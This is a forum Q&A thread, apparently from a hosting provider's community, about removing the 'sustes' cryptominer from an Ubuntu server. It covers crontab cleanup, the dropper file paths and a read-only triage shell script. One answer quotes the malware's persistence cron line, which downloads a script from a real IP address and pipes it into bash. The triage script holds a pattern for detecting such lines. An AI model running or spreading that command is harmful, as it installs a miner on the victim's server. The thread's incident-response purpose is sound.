What is this "sustes" in my process in my CPU stats?

July 11, 2018 9.4k views
Apache Ubuntu 16.04

Under CPU Processes I have one thread running high at 54.50 %.
I have no clue what it means...

4 Answers

This is a cryptominer malware. You must delete it from your droplets.
First delete this cron job. It runs under the user that launched the "sustes" process. You can find this username with "top" or in the output of this command:
ps aux | grep sustes

Then look at the cron jobs of this user:
crontab -u username -l
If it has this string

then edit this cron job
crontab -e -u username

or delete it entirely with
crontab -r -u username

Then delete these files:
/var/tmp/sustes
/var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123

  • Thanks for this, managed to get rid of it for a bit but keeps coming back.

    Any clues how to get rid of it completely?

    Reading about this malware it seems to have got in via SSH but that's now all locked down and passwords changed so it must be re-spawning itself from somewhere deeper.

Hello friend!

I'm afraid I have not heard of a process that identifies itself by that name, but that would generally be true of many applications that I have not personally used so it does not necessarily mean that anything is working other than in the intended way.

The short version of what this means is that software on your server is utilizing the CPU, and under an ideal scenario you would know what that software was in relation to how you set up the server and what that server's role is.

Going a bit deeper, I would SSH in and run "top" and then press C to reveal more about the process, particularly under the Command column. You should be able to see in more detail where it is being run from and what user on the system is running it. From there your path is a bit more of an unwritten story, as what you do next depends heavily on what you want to do and whether or not that is something that should be running on your system.

Kind Regards,
Jarland

We've found a similar script/process.
Turned out our test server had been compromised and it's actually been mining cryptocurrency.

Check the crontab file for the following:

* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

Edit: not sure if I should remove the IP address
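The first answer and the crontab entry quoted in the answer above together describe a manual triage: find which user runs the process, read that user's crontab for a download-and-execute entry, and check for the dropper files under /var/tmp. The script below is an added example, not code from this thread, that wraps those checks as read-only shell functions so they can be run against saved `ps aux` or crontab output as well as on the live machine. It assumes only what the answers report (the file paths and the "wget ... | bash" cron pattern); the function names and the sample data in the comments are this example's own and constructed.

```shell
#!/bin/sh
# Added example, not code from the original thread. Read-only triage helpers
# for the "sustes" miner: the dropper paths and the "wget ... | bash" cron
# pattern are the ones reported in the answers above. Function names are this
# example's own; sample inputs used in the comments are constructed.

# Dropper files named in the first answer.
SUSTES_PATHS="/var/tmp/sustes /var/tmp/sustes3 /var/tmp/wc.conf /var/tmp/123"

# Print crontab lines (read from stdin) that fetch something with wget/curl
# and pipe it straight into sh or bash, like the mr.sh entry quoted above.
# Commented-out lines are ignored. Feed it `crontab -u USER -l` output.
suspicious_cron_lines() {
    grep -E '(wget|curl)[^|]*[|][[:space:]]*(ba)?sh' | grep -v '^[[:space:]]*#'
}

# Given `ps aux` output on stdin, print each user (column 1) whose process
# command line contains NAME, one per line, deduplicated. Constructed input
# such as "www-data 4242 54.5 ... /var/tmp/sustes -c /var/tmp/wc.conf"
# yields "www-data".
users_running() {
    name=$1
    awk -v n="$name" 'NR > 1 && index($0, n) > 0 { print $1 }' | sort -u
}

# Print which of the known dropper files exist. ROOT is prefixed to each
# path (default empty, i.e. the live filesystem) so the same check can be
# pointed at a mounted disk image or a test directory.
present_artifacts() {
    root=${1:-}
    for p in $SUSTES_PATHS; do
        if [ -e "$root$p" ]; then
            echo "$root$p"
        fi
    done
}

# Live, read-only triage: who runs sustes, which crontabs carry a
# download-and-execute entry (every local user is checked, not only the
# one running the miner, because the comment above reports it coming back),
# and which dropper files remain. Cleanup itself (crontab -r -u USER,
# removing the files, killing the process) is left to the operator, as in
# the first answer.
triage_live() {
    echo "== users running sustes:"
    ps aux | users_running sustes
    echo "== suspicious crontab entries (user: line):"
    cut -d: -f1 /etc/passwd | while read -r u; do
        crontab -u "$u" -l 2>/dev/null | suspicious_cron_lines | sed "s/^/$u: /"
    done
    echo "== dropper files present:"
    present_artifacts
}

# Only touch the live system when explicitly asked:
#   sudo sh sustes_triage.sh --run
if [ "${1:-}" = "--run" ]; then
    triage_live
fi
```

Run it as root so `crontab -u` can read every user's crontab. The cron check is deliberately broader than the exact line quoted above, since any `wget`/`curl` piped into a shell from a cron entry is a persistence mechanism worth reviewing, whichever host it points at.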

We also had the same problem. We were using activemq 5.9, which we suspected might have the vulnerability, because after we updated it to the latest version the process didn't start automatically. We observed that every Friday the test server had this process automatically running.
